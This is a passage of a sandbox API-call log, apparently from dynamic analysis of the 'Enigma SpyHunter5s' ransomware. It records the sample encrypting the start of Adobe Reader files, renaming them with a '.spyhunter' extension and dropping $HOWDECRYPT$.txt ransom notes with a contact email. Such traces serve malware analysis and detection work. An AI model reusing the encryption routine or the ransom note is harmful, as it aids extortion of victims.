Flags=0x8, Size=0x70) returned 0x31f098 [0180.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1d8*=0x30) returned 1 [0180.313] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.315] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT") returned 99 [0180.315] StrStrW (lpFirst="CHINSIMP.TXT", lpSrch=".txt") returned 0x0 [0180.315] GetProcessHeap () returned 0x2c0000 [0180.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.315] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e19c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e19c*=0x2800, lpOverlapped=0x0) returned 1 [0180.415] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.415] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e19c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e19c*=0x2800, lpOverlapped=0x0) returned 1 [0180.415] GetProcessHeap () returned 0x2c0000 [0180.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.415] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.415] WriteFile (in: hFile=0x178, lpBuffer=0x57e1dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e19c, lpOverlapped=0x0 | out: lpBuffer=0x57e1dc*, lpNumberOfBytesWritten=0x57e19c*=0x4, lpOverlapped=0x0) returned 1 [0180.416] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e19c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e19c*=0x30, lpOverlapped=0x0) returned 1 [0180.416] CloseHandle (hObject=0x178) returned 1 [0180.416] GetProcessHeap () returned 0x2c0000 [0180.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.416] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT.spyhunter") returned 109 [0180.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt.spyhunter")) returned 1 [0180.417] GetProcessHeap () returned 0x2c0000 [0180.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.417] GetProcessHeap () returned 0x2c0000 [0180.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.417] GetProcessHeap () returned 0x2c0000 [0180.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1da8 | out: hHeap=0x2c0000) returned 1 [0180.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.423] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0180.423] WriteFile (in: hFile=0x178, lpBuffer=0x57e10f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e238, lpOverlapped=0x0 | out: lpBuffer=0x57e10f*, lpNumberOfBytesWritten=0x57e238*=0x127, lpOverlapped=0x0) returned 1 [0180.423] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0180.423] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e238, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e238*=0x2ac, lpOverlapped=0x0) returned 1 [0180.424] CloseHandle (hObject=0x178) returned 1 [0180.424] GetProcessHeap () returned 0x2c0000 [0180.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f310 | out: hHeap=0x2c0000) returned 1 [0180.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.425] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0180.425] WriteFile (in: hFile=0x178, lpBuffer=0x57e10b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e234, lpOverlapped=0x0 | out: lpBuffer=0x57e10b*, lpNumberOfBytesWritten=0x57e234*=0x127, lpOverlapped=0x0) returned 1 [0180.430] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0180.430] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e234, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e234*=0x2ac, lpOverlapped=0x0) returned 1 [0180.430] CloseHandle (hObject=0x178) returned 1 [0180.430] GetProcessHeap () returned 0x2c0000 [0180.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e0e0 | out: hHeap=0x2c0000) returned 1 [0180.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.431] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0180.431] WriteFile (in: hFile=0x178, lpBuffer=0x57e107*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e230, lpOverlapped=0x0 | out: lpBuffer=0x57e107*, lpNumberOfBytesWritten=0x57e230*=0x127, lpOverlapped=0x0) returned 1 [0180.432] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0180.432] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e230, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e230*=0x2ac, lpOverlapped=0x0) returned 1 [0180.432] CloseHandle (hObject=0x178) returned 1 [0180.432] GetProcessHeap () returned 0x2c0000 [0180.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee14a0 | out: hHeap=0x2c0000) returned 1 [0180.432] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.433] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0180.434] WriteFile (in: hFile=0x178, lpBuffer=0x57e103*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e22c, lpOverlapped=0x0 | out: lpBuffer=0x57e103*, lpNumberOfBytesWritten=0x57e22c*=0x127, lpOverlapped=0x0) returned 1 [0180.434] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0180.434] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e22c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e22c*=0x2ac, lpOverlapped=0x0) returned 1 [0180.434] CloseHandle (hObject=0x178) returned 1 [0180.435] GetProcessHeap () returned 0x2c0000 [0180.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e831a0 | out: hHeap=0x2c0000) returned 1 [0180.435] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1c8 | out: pbBuffer=0x57e1c8) returned 1 [0180.435] GetProcessHeap () returned 0x2c0000 [0180.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.435] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1c0*=0x30) returned 1 [0180.435] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.436] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp") returned 101 [0180.436] StrStrW (lpFirst="usa37.hyp", lpSrch=".txt") returned 0x0 [0180.436] GetProcessHeap () returned 0x2c0000 [0180.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.436] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e184, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e184*=0x2800, lpOverlapped=0x0) returned 1 [0180.496] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.496] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e184, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e184*=0x2800, lpOverlapped=0x0) returned 1 [0180.496] GetProcessHeap () returned 0x2c0000 [0180.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.496] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.496] WriteFile (in: hFile=0x178, lpBuffer=0x57e1c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e184, lpOverlapped=0x0 | out: lpBuffer=0x57e1c4*, lpNumberOfBytesWritten=0x57e184*=0x4, lpOverlapped=0x0) returned 1 [0180.597] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e184, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e184*=0x30, lpOverlapped=0x0) returned 1 [0180.597] CloseHandle (hObject=0x178) returned 1 [0180.597] GetProcessHeap () returned 0x2c0000 [0180.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.598] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp.spyhunter") returned 111 [0180.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp.spyhunter")) returned 1 [0180.608] GetProcessHeap () returned 0x2c0000 [0180.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.608] GetProcessHeap () returned 0x2c0000 [0180.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.608] GetProcessHeap () returned 0x2c0000 [0180.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1388 | out: hHeap=0x2c0000) returned 1 [0180.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1c8 | out: pbBuffer=0x57e1c8) returned 1 [0180.608] GetProcessHeap () returned 0x2c0000 [0180.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1c0*=0x30) returned 1 [0180.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.609] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp") returned 99 [0180.609] StrStrW (lpFirst="tur.hyp", lpSrch=".txt") returned 0x0 [0180.609] GetProcessHeap () returned 0x2c0000 [0180.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.609] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e184, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e184*=0x800, lpOverlapped=0x0) returned 1 [0180.688] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.688] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x57e184, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e184*=0x800, lpOverlapped=0x0) returned 1 [0180.689] GetProcessHeap () returned 0x2c0000 [0180.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.689] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.689] WriteFile (in: hFile=0x178, lpBuffer=0x57e1c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e184, lpOverlapped=0x0 | out: lpBuffer=0x57e1c4*, lpNumberOfBytesWritten=0x57e184*=0x4, lpOverlapped=0x0) returned 1 [0180.689] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e184, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e184*=0x30, lpOverlapped=0x0) returned 1 [0180.689] CloseHandle (hObject=0x178) returned 1 [0180.689] GetProcessHeap () returned 0x2c0000 [0180.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.689] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp.spyhunter") returned 109 [0180.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp.spyhunter")) returned 1 [0180.690] GetProcessHeap () returned 0x2c0000 [0180.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.691] GetProcessHeap () returned 0x2c0000 [0180.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.691] GetProcessHeap () returned 0x2c0000 [0180.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee0cf8 | out: hHeap=0x2c0000) returned 1 [0180.691] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1c0 | out: pbBuffer=0x57e1c0) returned 1 [0180.691] GetProcessHeap () returned 0x2c0000 [0180.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.691] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1b8*=0x30) returned 1 [0180.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.692] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca") returned 99 [0180.692] StrStrW (lpFirst="tur.fca", lpSrch=".txt") returned 0x0 [0180.692] GetProcessHeap () returned 0x2c0000 [0180.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.692] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e17c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e17c*=0x2c4, lpOverlapped=0x0) returned 1 [0180.693] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.693] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x57e17c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e17c*=0x2c4, lpOverlapped=0x0) returned 1 [0180.693] GetProcessHeap () returned 0x2c0000 [0180.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.693] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.693] WriteFile (in: hFile=0x178, lpBuffer=0x57e1bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e17c, lpOverlapped=0x0 | out: lpBuffer=0x57e1bc*, lpNumberOfBytesWritten=0x57e17c*=0x4, lpOverlapped=0x0) returned 1 [0180.693] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e17c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e17c*=0x30, lpOverlapped=0x0) returned 1 [0180.693] CloseHandle (hObject=0x178) returned 1 [0180.694] GetProcessHeap () returned 